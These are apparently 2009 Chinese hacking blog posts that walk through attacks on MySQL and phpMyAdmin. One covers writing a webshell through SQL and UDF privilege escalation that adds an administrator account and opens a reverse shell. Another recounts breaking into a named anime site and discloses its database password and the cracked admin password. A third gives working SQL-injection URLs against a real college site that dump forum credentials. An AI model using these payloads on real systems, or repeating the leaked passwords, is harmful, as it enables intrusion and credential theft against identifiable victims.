GuLang's Blog - 安全检测

利用Mysql和PHPmyadmin提权入侵

chenliangsx@gmail.com(admin) — Tue,24 Nov 2009 12:05:15 +0800

1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法:
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
hpmyadmin\themes\darkblue_orange\layout.inc.php

D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;
----end code---

2:mix.dll提权
D:/usr/www/html/mix.dll
mysql -h 目标ip -uroot -p
\. c:\mysql.txt
select Mixconnect('反弹ip','端口');
nc -vv -l -p 1983

3:udf.dll提权
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('c:\3389.exe');
drop function cmdshell; 删除函数
select cmdshell('netstat -an');
load data infile "d:\\www\\gb\\about\\about.htm" into table tmp;
判断文件存不存在mysql的语句

MySql入侵检测某PR6动漫站(图)

chenliangsx@gmail.com(admin) — Fri,20 Feb 2009 03:01:10 +0800

话说此站我搞了好几天都搞不下来，让记忆帮想办法，记忆也没什么好方法。最终今天改下思路，搞定！过程如下：
找到一个点
http://www.webacg.com/job/zixun_content.php?id=71
and 1=1   and 1=2判断可注.
url字母大写返回出错,Linux.
order by 判断字段数为10
union select 联合查询得到 3 5 8可查变量
分别user() database() version()得到
user:root
版本:5.0.22-Community
数据库:sino_job
既然是root,我们load_file来读他文件：
/usr/local/apache2/conf/httpd.conf
得到网站安装路径信息如下：
NameVirtualHost 60.217.32.159:80
ServerName *.webacg.com
DocumentRoot /var/www/html
       RewriteEngine On
       RewriteCond %{REQUEST_URI} ^/
       RewriteRule /(.*) http://www.webacg.com/$1 [R=permanent,L]
ServerName www.sinoacg.com
ServerAlias sinoacg.com
DocumentRoot /var/www/html/2
       RewriteEngine On
       RewriteRule ^(.*)/archiver/((fid|tid)-[\w\-]+\.html)$ $1/archiver/index.php?$2
       RewriteRule ^(.*)/forum-([0-9]+)-([0-9]+)\.html$ $1/forumdisplay.php?fid=$2&page=$3
       RewriteRule ^(.*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/viewthread.php?tid=$2&extra=page\%3D$4&page=$3
       RewriteRule ^(.*)/space-(username|uid)-(.+)\.html$ $1/space.php?$2=$3
       RewriteRule ^(.*)/tag-(.+)\.html$ $1/tag.php?name=$2
ServerName www.webacg.com
ServerAlias webacg.com
DocumentRoot /var/www/html/1
       RewriteEngine On
       RewriteRule ^(.*)/archiver/((fid|tid)-[\w\-]+\.html)$ $1/archiver/index.php?$2
       RewriteRule ^(.*)/forum-([0-9]+)-([0-9]+)\.html$ $1/forumdisplay.php?fid=$2&page=$3
       RewriteRule ^(.*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/viewthread.php?tid=$2&extra=page\%3D$4&page=$3
       RewriteRule ^(.*)/space-(username|uid)-(.+)\.html$ $1/space.php?$2=$3
       RewriteRule ^(.*)/tag-(.+)\.html$ $1/tag.php?name=$2
#       RewriteCond %{REQUEST_URI} ^/
#       RewriteRule /magzine/(.*) http://d.webacg.com/magzine/$1 [R=permanent,L]
ServerName www.webacg.net
ServerAlias webacg.net
DocumentRoot /var/www/html/3
ServerName webacg.shengtianle.com
DocumentRoot /var/www/html/gcbdell
ServerName www.dad1.cn
ServerAlias www.dad1.com.cn dad1.cn dad1.com.cn www.dadiw.com.cn dadiw.com.cn
DocumentRoot /var/www/html/gaosu/
再load_file一次读MYSQL的配置文件:
/etc/my.cnf
得到MYsql密码:gcbdell#8367396@!~846462
到了这里,没什么说的,登陆phpmyadmin提全是吧?但是问题出现了,登陆phpmyadmin提示页面不存在.用牛族的supermysql连接也连接失败,诧异ing…或许是只允许本地连接,OK,想其他办法.
很显然,下一个想法就是更直接的 into outfile到出webshell了,但是问题又出现了(我怎么总出问题),一句话写不进去,这是为什么呢?或许是权限问题吧,换了几个目录,依然如此,晕,想其他办法.
这样不行,咱们就来最原始的方法,我爆你管理员帐户密码,我登陆后台想办法行吧?但是问题又出现了,这个不用说大家也能想到,我找不到密码跟后台- -!
到了此处,陷入痛苦的思考中…
仔细看了下,我刚才的那个点是一个叫做job的栏目,那么看下主站,嗯?有个论坛,思路来了!访问论坛看下论坛管理员ID:sinokl    看到这个用户名是不是有点眼熟?没错,我们之前查询出来的当前数据库叫做sino_job,这么说的话,管理员很喜欢sino 或者是sinokl这个用户名了,之前我们得到的MYsql的密码是gcbdell#8367396@!~846462看到这个密码我第一感觉就是他这个密码是拼出来的!很显然gcbdell是一个,8367396是一个846462是一个(或许数字是Q号之类的),那么我们可以尝试把这几段字符分别尝试或者拼接之后进行尝试登陆他的论坛,看了下貌似DZ的论坛,登陆进去提权不是什么难事.但是问题又出现了- -!首先,论坛有个安全机制就是密码尝试出错5次,就要等15分钟后继续尝试,我的天,尝试了N多组合都不行:
gcbdell#8367396@!~846462
gcbdell
8367396
846462
gcbdell#8367396
gcbdell#846462
gcbdell8367396
gcbdell846462
@!~846462
@!~8367396
#8367396
sinokl
sinokl846462
sinokl8367396
gcbdellsinokl
sinoklgcbdell
怎么办?怎么办?
今天闲来无事,想继续搞搞看看,那么咱们就相信一下工具把,拿出穿山甲试了下,速度慢到死,最后也同样是无法得到密码…转了转,突然想起来,狼族不是出了一个专门的工具么?叫wsi来着貌似,上网找了下最新版本,貌似是奥运版- -!拿来试试吧,得到如下数据库

这么一看,整个网站结构应该很清楚了,看到其中一个名为sinogcbbt,为什么叫bbt呢?或许是故意写错的吧.OK,继续,最终得到管理员如下信息.


看到这串MD5,说实话,我有点迷糊,这种大站的话密码应该是比较复杂的,MD5一般是查不出来的,自己跑不现实,何况彩虹表那么大,等下来我也老了.一边想其他思路,一边去试试看吧,没想到我人品这么好,竟然查到管理员密码:jiao846462#@!
hoho~~~果然不出我所料,是拼起来的,不过前面多了个jiao,这让我到哪蒙去啊,真是…
下面的就不用多说了,登陆DZ论坛后台,提权拿shell提权…

手工注入纽约大学

chenliangsx@gmail.com(admin) — Sat,14 Feb 2009 12:39:42 +0800

作者：指扣（c_fans）

过年了好忙各种事情。
对待站我们应该耐心的去对待各种问题。包括以下出到的问题。
由于时间问题。作为版主拿出代表性的几点希望为以后大家的技术有所帮助。

一原理分析
我看看mysql5比之前增加的系统数据库information_schema的结构，它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+—————————————+
| Tables_in_information_schema |
+—————————————+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+—————————————+
这里只挑注射中可以用到的几个表。
| SCHEMATA ――>存储数据库名的，
|——>关键字段：SCHEMA_NAME，表示数据库名称
| TABLES ――>存储表名的
|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；
TABLE_NAME表示表的名称
| COLUMNS ――>存储字段名的
|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
二注入过程
1 版本号：1:版本号http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(@@version)),6,7,8,9,10,11 /*（这里用hex unhex绕过错误）

2用户名：2：用户名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(user())),6,7,8,9,10,11/*

3数据库名：11:数据库库名：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(SCHEMA_NAME)),6,7,8,9,10,11%20from%20information_schema.SCHEMATA%20where%20SCHEMA_NAME%20like%20char(37,105,108,116,95,112,104,112,98,98,37)/* 这里我们找下phpbb的表段。（关键模糊查询，有些库名是很多的。甚至上百，模糊查询可以帮你找到你所希望的。例如：%pass% %phpbb%等有用的表）

4段名：4：段名http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database() /*（这里直接利用查询=database查询与用户有关的段）

5：避免限制limit的：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%20char(117,115,101,114,115%20) /*（有些情况下limit是被限制的之类我们可以采用！=来绕过）
6：username：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%202,1/*
7：password：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%206,1 /*（由于长度问题这里显示不出来经试验此表并不重要）
8 容错的：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=-1%20union%09select%091,2,3,4,username,6,7,8,9,10,11%09from%09users /*（大家注意这条语句很多情况下如果我们id=64 是不行的这里64可换为-1 两外%20换为%09 多多注意哦）
9模糊查询：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_name%20like%20char(37,112,104,112,37)/*
10：结果：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64+union+select+1,2,3,4,unhex(hex(concat(username,0×3a,user_password))),6,7,8,9,10,11+from+ilt_phpbb.phpbb_users

时间关系不再补充关键字段已经爆出。
用户密码也已经爆出。
关键在于大家对于MY SQL注入错误的一些对待问题。
希望此文可以帮助大家。